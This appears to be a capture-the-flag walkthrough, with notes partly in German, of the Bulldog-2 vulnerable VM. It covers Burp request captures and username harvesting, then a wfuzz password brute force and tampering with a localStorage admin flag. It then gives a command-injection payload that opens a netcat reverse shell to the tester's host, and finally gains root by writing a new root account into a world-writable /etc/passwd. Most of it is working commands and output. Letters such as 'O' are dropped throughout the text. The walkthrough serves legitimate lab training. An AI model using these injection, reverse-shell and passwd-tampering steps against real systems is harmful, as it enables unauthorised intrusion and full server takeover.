Initial Access
Burpsuite
Request:
PST /users/authenticate HTTP/1.1
Host: 192.168.2.112
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/plain, */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
content-type: application/json
Content-Length: 49
rigin: http://192.168.2.112
DNT: 1
Connection: keep-alive
Referer: http://192.168.2.112/login
Sec-GPC: 1
Priority: u=0
{
"username": "acsacsac",
"password": "csc"
}
Response:
HTTP/1.1 401 Unauthorized
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 31 ct 2024 15:33:24 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 41
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-rigin: *
ETag: W/"29-PaR2ao+BjJ1D0mR+rg2QmRvUow"
{"success":false,"msg":"Incorrect Login"}
Request:
PST /users/authenticate HTTP/1.1
Host: 192.168.2.112
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/plain, */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
content-type: application/json
Content-Length: 60
rigin: http://192.168.2.112
DNT: 1
Connection: keep-alive
Referer: http://192.168.2.112/login
Sec-GPC: 1
Priority: u=0
{
"username": "acsacsac",
"password": "csc"
"id":"id"
}
Response:
HTTP/1.1 400 Bad Request
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 31 ct 2024 15:34:09 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1059
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-rigin: *
Content-Security-Policy: default-src 'self'
SyntaxError: Unexpected string in JSN at position 49...
Request:
GET /users/getUsers?limit=9 HTTP/1.1
GET /users/getUsers HTTP/1.1
Host: 192.168.2.112
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/plain, */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: http://192.168.2.112/users
Sec-GPC: 1
If-None-Match: W/"203-jBv25pYD0TZiNkVkHls/dhIqaxM"
Response:
HTTP/1.1 200 K
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 31 ct 2024 15:45:38 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 895335
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-rigin: *
ETag: W/"da967-2m2gIssXgQ92tBsCxgWuWScj3c"
[{"name":"Berna Phillips","username":"lrberna","rand":22},
{"name":"LeeAnn Pham","username":"anleeann","rand":5},
{"name":"Vijay Wells","username":"eivijay","rand":13},
....
....
┌──(root㉿CCat)-[~]
└─# curl http://192.168.2.112/users/getUsers -s | jq | grep username | cut -f4 -d "\"" > users.txt
┌──(root㉿CCat)-[~]
└─# wfuzz -w users.txt -w /usr/share/wordlists/fasttrack.txt \
-H "Host: 192.168.2.112" \
-H "Accept: application/json, text/plain, */*" \
-H "Referer: http://192.168.2.112/login" \
-H "Content-Type: application/json" \
-d "{\"username\":\"FUZZ\",\"password\":\"FUZ2Z\"}" --hc=401 -t 125 -c http://192.168.2.112/users/authenticate
Target: http://192.168.2.112/users/authenticate
------------------------------------------------------------------------------------------------
ID Response Lines Word Chars Payload
------------------------------------------------------------------------------------------------
000002080: 200 0 L 3 W 454 Ch "mdrudie - qwerty"
Total time: 0
Processed Requests: 2605
Filtered Requests: 2604
Requests/sec.: 0
mdrudie
http://192.168.2.112/profile/mdrudie
Bulldog.social
Profile
Logout
Rudie Ramirez
Username: mdrudie
Email: rudieramirez@happymail.com
About Us | Twitter | Instagram
http://192.168.2.112/profile/mdrudie
function (l, n) {
var u = n.component;
l(n, 3, 0, l(n, 4, 0, '/')),
l(n, 12, 0, u.authService.isAdmin()),
l(n, 15, 0, u.authService.loggedIn()),
l(n, 18, 0, u.authService.loggedut()),
l(n, 21, 0, u.authService.loggedut()),
l(n, 24, 0, u.authService.loggedIn())
},
function (l, n) {
l(n, 2, 0, T['ɵnov'](n, 3).target, T['ɵnov'](n, 3).href)
}
)
l.prototype.isAdmin = function () {
var l = localStorage.getItem('user');
return null ! l &&
'master_admin_user' JSN.parse(l).auth_level
},
l.prototype.storeUserData = function (l, n) {
localStorage.setItem('id_token', l),
localStorage.setItem('user', JSN.stringify(n)),
this.authToken = l,
this.user = n
https://beehosting.pro/webtools/javascript-deobfuscator
},
l.prototype.authenticateUser = function (l) {
return this.http.post('/users/authenticate', l).map(function (l) {
return l.json()
})
},
l.prototype.authenticateLinkUser = function (l) {
return this.http.post('/users/linkauthenticate', l).map(function (l) {
return l.json()
})
(l() (), T['ɵted']( - 1, null, [
'Admin Dashboard'
])),
(l() (), T['ɵted']( - 1, null, [
'\n '
])),
function (l, n) {
l(n, 1, 0, l(n, 4, 0, !0), l(n, 5, 0, 'active')),
l(n, 7, 0, l(n, 8, 0, '/dashboard'))
l.prototype.isAdmin = function () {
var l = localStorage.getItem('user');
return null ! l &&
'master_admin_user' JSN.parse(l).auth_level //Vulnerabele Funktion
},
l.prototype.storeUserData = function (l, n) {
localStorage.setItem('id_token', l),
localStorage.setItem('user', JSN.stringify(n)),
this.authToken = l,
this.user = n
http://192.168.2.112/profile/mdrudie
F12/local Storage
id_token JWT eyJhbGciiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXlsb2FkIjp7Im5hbWUiiJSdWRpZSBSYW1pcmV6IiwiZW1haWwiiJydWRpZXJhbWlyZXpAaGFwcHltYWlsLmNvbSIsInVzZXJuYW1lIjoibWRydWRpZSIsImF1dGhfbGV2ZWwiiJzdGFuZGFyZF91c2VyIiwicmFuZCI6MjF9LCJpYXQijE3MzAzTI1MzYsImV4cCI6MTczMDk5NzMzNn0.M8jQhg0e2YlgWKjHIgxRHlk6dHdgDUZfpL7hbN1sw
user {"name":"Rudie Ramirez","username":"mdrudie","email":"rudieramirez@happymail.com","auth_level":"standard_user"}´
http://192.168.2.112/users/linkauthenticate
Bulldog.social
Admin
Profile
Logout
https://github.com/Frichetten/Bulldog-2-The-Reckoning
https://github.com/Frichetten/Bulldog-2-The-Reckoning/blob/master/routes/users.js
router.post('/linkauthenticate', (req, res, next) => {
const username = req.body.password;
const password = req.body.password;
Proof of Concept: Privilege Escalation
Kurzbeschreibung
Die `/users/linkauthenticate`-Route verwendet fälschlicherweise das Passwortfeld sowohl für den Benutzernamen als auch für das Passwort.
Dies ermöglicht die Injektion von Shell-Befehlen in das Passwortfeld, um eine Reverse Shell zu starten.
Voraussetzungen
- Ein gültiger Benutzeraccount (z.B. mdrudie).
- Zugriff auf die Entwicklerwerkzeuge des Browsers.
Schritt-für-Schritt-Anleitung
- Melde dich mit dem gültigen Benutzeraccount (mdrudie) an.
- Manipuliere den Wert von `auth_level` im `localStorage` auf `master_admin_user`, um den "Admin"-Link im Menü anzuzeigen.
- Klicke auf den "Admin"-Link.
- Sende eine POST-Anfrage an `/users/linkauthenticate` mit dem folgenden JSON-Payload:
```json
{
"username": "admin",
"password": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444>/tmp/f"
}
```
Ersetze `` mit deiner eigenen IP-Adresse.
- Starte einen Netcat-Listener auf Port 4444 auf deinem System:
```bash
nc -lvnp 4444
```
Erwartetes Ergebnis
Du solltest eine Reverse Shell als Node-Benutzer auf deinem System erhalten.
Beweismittel
Die folgenden Code-Blöcke zeigen die Schritte zur Ausnutzung der Schwachstelle und den erfolgreichen Erhalt einer Reverse Shell.
Risikobewertung
Die Ausnutzung dieser Schwachstelle ermöglicht es einem Angreifer, Befehle auf dem Server als Node-Benutzer auszuführen.
Dies kann zu Datenverlust, Systemausfällen und anderen schwerwiegenden Folgen führen.
Empfehlungen
Behebe die Schwachstelle in der `/users/linkauthenticate`-Route, indem du den Benutzernamen und das Passwort korrekt validierst.
Implementiere zusätzliche Sicherheitsmaßnahmen, um die Auswirkungen einer erfolgreichen Ausnutzung zu minimieren.
Privilege Escalation
Request:
GET /users/linkauthenticate HTTP/1.1
Host: 192.168.2.112
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
If-Modified-Since: Sun, 15 Jul 2018 14:58:16 GMT
If-None-Match: W/"465-1649e73083e"
Priority: u=0, i
Content-Length: 125
{
"username": "admin",
"password": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.199 4444>/tmp/f"
}
Response:
HTTP/1.1 304 Not Modified
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 31 ct 2024 18:07:45 GMT
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-rigin: *
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Sun, 15 Jul 2018 14:58:16 GMT
ETag: W/"465-1649e73083e"
Request:
PST /users/linkauthenticate HTTP/1.1
Host: 192.168.2.112
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/plain, */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: http://192.168.2.112/profile/mdrudie
Sec-GPC: 1
If-None-Match: W/"79-hNsbyECh7xMFIuLYTiCgVBhu/hI"
Content-Length: 128
{
"username": "admin",
"password": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.199 4444>/tmp/f"
}
Response:
HTTP/1.1 200 K
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 31 ct 2024 18:13:34 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 40
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-rigin: *
ETag: W/"28-44Xo62/YZrQm4R4i7yg1FLYkPXI"
{"success":false,"msg":"Wrong password"}
┌──(root㉿CCat)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.199] from (UNKNWN) [192.168.2.112] 46548
/bin/sh: 0: can't access tty; job control turned off
$
┌──(root㉿CCat)-[~]
└─# find / -type f -perm -4000 -ls 2>/dev/null
524374 44 -rwsr-xr-x 1 root root 43088 Sep 16 2020 /bin/mount
524408 64 -rwsr-xr-x 1 root root 64424 Mar 9 2017 /bin/ping
524357 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
524657 44 -rwsr-xr-x 1 root root 44664 Nov 29 2022 /bin/su
524424 28 -rwsr-xr-x 1 root root 26696 Sep 16 2020 /bin/umount
3634 20 -rwsr-xr-x 1 root root 18448 Mar 9 2017 /usr/bin/traceroute6.iputils
1955 24 -rwsr-xr-x 1 root root 22520 Jan 12 2022 /usr/bin/pkexec
9375 40 -rwsr-xr-x 1 root root 40344 Nov 29 2022 /usr/bin/newgrp
3676 44 -rwsr-xr-x 1 root root 44528 Nov 29 2022 /usr/bin/chsh
9548 148 -rwsr-xr-x 1 root root 149080 Apr 4 2023 /usr/bin/sudo
3678 76 -rwsr-xr-x 1 root root 75824 Nov 29 2022 /usr/bin/gpasswd
3178 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
3675 76 -rwsr-xr-x 1 root root 76496 Nov 29 2022 /usr/bin/chfn
9567 40 -rwsr-xr-x 1 root root 37136 Nov 29 2022 /usr/bin/newgidmap
3679 60 -rwsr-xr-x 1 root root 59640 Nov 29 2022 /usr/bin/passwd
9569 40 -rwsr-xr-x 1 root root 37136 Nov 29 2022 /usr/bin/newuidmap
3828 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
141245 80 -rwsr-xr-x 1 root root 80056 Aug 1 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
40072 428 -rwsr-xr-x 1 root root 436552 Aug 11 2021 /usr/lib/openssh/ssh-keysign
1957 16 -rwsr-xr-x 1 root root 14328 Jan 12 2022 /usr/lib/policykit-1/polkit-agent-helper-1
62807 128 -rwsr-xr-x 1 root root 130264 May 29 2023 /usr/lib/snapd/snap-confine
39748 44 -rwsr-xr-- 1 root messagebus 42992 ct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
66 40 -rwsr-xr-x 1 root root 40152 Jun 14 2022 /snap/core/16202/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/16202/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/16202/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Nov 29 2022 /snap/core/16202/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Jun 14 2022 /snap/core/16202/bin/umount
2646 71 -rwsr-xr-x 1 root root 71824 Nov 29 2022 /snap/core/16202/usr/bin/chfn
2648 40 -rwsr-xr-x 1 root root 40432 Nov 29 2022 /snap/core/16202/usr/bin/chsh
2725 74 -rwsr-xr-x 1 root root 75304 Nov 29 2022 /snap/core/16202/usr/bin/gpasswd
2817 39 -rwsr-xr-x 1 root root 39904 Nov 29 2022 /snap/core/16202/usr/bin/newgrp
2830 53 -rwsr-xr-x 1 root root 54256 Nov 29 2022 /snap/core/16202/usr/bin/passwd
2940 134 -rwsr-xr-x 1 root root 136808 May 24 2023 /snap/core/16202/usr/bin/sudo
3039 42 -rwsr-xr-- 1 root systemd-resolve 42992 Sep 14 2023 /snap/core/16202/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3411 419 -rwsr-xr-x 1 root root 428240 Aug 8 2023 /snap/core/16202/usr/lib/openssh/ssh-keysign
6485 125 -rwsr-xr-x 1 root root 127656 Sep 18 2023 /snap/core/16202/usr/lib/snapd/snap-confine
7673 386 -rwsr-xr-- 1 root dip 394984 Jul 23 2020 /snap/core/16202/usr/sbin/pppd
66 40 -rwsr-xr-x 1 root root 40152 Jun 14 2022 /snap/core/17200/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/17200/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/17200/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Feb 7 2024 /snap/core/17200/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Jun 14 2022 /snap/core/17200/bin/umount
2644 71 -rwsr-xr-x 1 root root 71824 Feb 7 2024 /snap/core/17200/usr/bin/chfn
2646 40 -rwsr-xr-x 1 root root 40432 Feb 7 2024 /snap/core/17200/usr/bin/chsh
2723 74 -rwsr-xr-x 1 root root 75304 Feb 7 2024 /snap/core/17200/usr/bin/gpasswd
2815 39 -rwsr-xr-x 1 root root 39904 Feb 7 2024 /snap/core/17200/usr/bin/newgrp
2828 53 -rwsr-xr-x 1 root root 54256 Feb 7 2024 /snap/core/17200/usr/bin/passwd
2938 134 -rwsr-xr-x 1 root root 136808 May 24 2023 /snap/core/17200/usr/bin/sudo
3037 42 -rwsr-xr-- 1 root systemd-resolve 42992 Sep 14 2023 /snap/core/17200/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3409 419 -rwsr-xr-x 1 root root 428240 Jan 9 2024 /snap/core/17200/usr/lib/openssh/ssh-keysign
6483 125 -rwsr-xr-x 1 root root 127520 Jun 6 14:32 /snap/core/17200/usr/lib/snapd/snap-confine
7666 386 -rwsr-xr-- 1 root dip 394984 Jul 23 2020 /snap/core/17200/usr/sbin/pppd
$ curl
/bin/sh: 2: curl: not found
$ which python
/usr/bin/python
node@bulldog2:/var/www/node/Bulldog-2-The-Reckoning$ cd ~
node@bulldog2$ ls -la
total 32
drwxr-xr-x 3 node node 4096 Jul 15 2018 .
drwxr-xr-x 4 root root 4096 Jul 15 2018 ..
-rw-rw-r-- 1 node node 85 Jul 15 2018 .bash_history
-rw-r--r-- 1 node node 220 Jul 15 2018 .bash_logout
-rw-r--r-- 1 node node 3771 Jul 15 2018 .bashrc
-rw- 1 node node 10 Jul 15 2018 .node_repl_history
drwxrwxr-x 5 node node 4096 ct 31 14:58 .pm2
-rw-r--r-- 1 node node 807 Jul 15 2018 .profile
node@bulldog2$ cat .bash_history
history
shred -u ~/.bash_history && touch ~/.bash_history
history
exit
history
exit
node@bulldog2$ cd /home/
node@bulldog2:/home$ ls
admin node
node@bulldog2:/home$ cd admin/
node@bulldog2:/home/admin$ ls -la
total 60
drwxr-xr-x 8 admin admin 4096 Jul 15 2018 .
drwxr-xr-x 4 root root 4096 Jul 15 2018 ..
-rw-r--r-- 1 admin admin 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 admin admin 15 Jul 15 2018 .bashrc
drwx 2 admin admin 4096 Jul 15 2018 .cache
drwx 3 root root 4096 Jul 15 2018 .config
-rw- 1 admin admin 236 Jul 15 2018 .dbshell
drwx 3 admin admin 4096 Jul 15 2018 .gnupg
-rw- 1 admin admin 0 Jul 15 2018 .mongorc.js
drwxr-xr-x 3 admin admin 4096 Jul 15 2018 .node-gyp
drwxr-xr-x 6 admin admin 4096 Jul 15 2018 .npm
drwxr-xr-x 5 root root 4096 Jul 15 2018 .pm2
-rw-r--r-- 1 admin admin 807 Apr 4 2018 .profile
-rw-r--r-- 1 admin admin 0 Jul 15 2018 .sudo_as_admin_successful
-rw- 1 root root 8307 Jul 15 2018 .viminfo
node@bulldog2:/home/admin$ find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
-rwxrwxrwx 1 root root 1653 Jul 15 2018 /etc/passwd
-rw-rw-rw- 1 root root 0 ct 31 14:58 /sys/kernel/security/apparmor/.access
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/user.slice/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/lxd-containers.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/apport.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/systemd-random-seed.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/grub-common.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/systemd-journal-flush.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/systemd-user-sessions.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/snap-core-16202.mount/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/lvm2-monitor.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/pm2-node.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/systemd-tmpfiles-setup-dev.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/snap-core-17200.mount/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/atd.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/kmod-static-nodes.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/ufw.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/systemd-sysctl.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/systemd-networkd.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/setvtrgb.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/systemd-udev-trigger.service/cgroup.event_control
--w--w--w- 1 root root 0 ct 31 18:21 /sys/fs/cgroup/memory/system.slice/lxd.socket/cgroup
...
...
....
node@bulldog2:/home/admin$ ls -la /etc/passwd
-rwxrwxrwx 1 root root 1653 Jul 15 2018 /etc/passwd
node@bulldog2:/tmp$ nano /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106/home/syslog:/usr/sbin/nologin
messagebus:x:103:107/nonexistent:/usr/sbin/nologin
_apt:x:104:65534/nonexistent:/usr/sbin/nologin
lxd:x:105:65534/var/lib/lxd/:/bin/false
uuidd:x:106:110/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1/var/cache/pollinate:/bin/false
sshd:x:110:65534/run/sshd:/usr/sbin/nologin
admin:x:1000:1004:admin:/home/admin:/bin/bash
mongodb:x:111:65534/home/mongodb:/usr/sbin/nologin
node:x:1001:1005:,,,:/home/node:/bin/bash
darkspirit:$6$EZdVo4XckcU2BJJi$IanX1gZA.t1nk2EgRy1SBDPGa69dLrCqv3eznvqru062GCQ6Eh7VQyXI3lKgsdItq3F/uMWs/VU/TR2E1tzF0:0:0:root:/root:/bin/bash
node@bulldog2:/tmp$ su darkspirit
Password:
root@bulldog2:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@bulldog2:/tmp# cd ~
root@bulldog2: ls
flag.txt
root@bulldog2: cat flag.txt
Congratulations on completing this VM :D That wasn't so bad was it?
Let me know what you thought on twitter, I'm @frichette_n
I'm already working on another more challenging VM. Follow me for updates.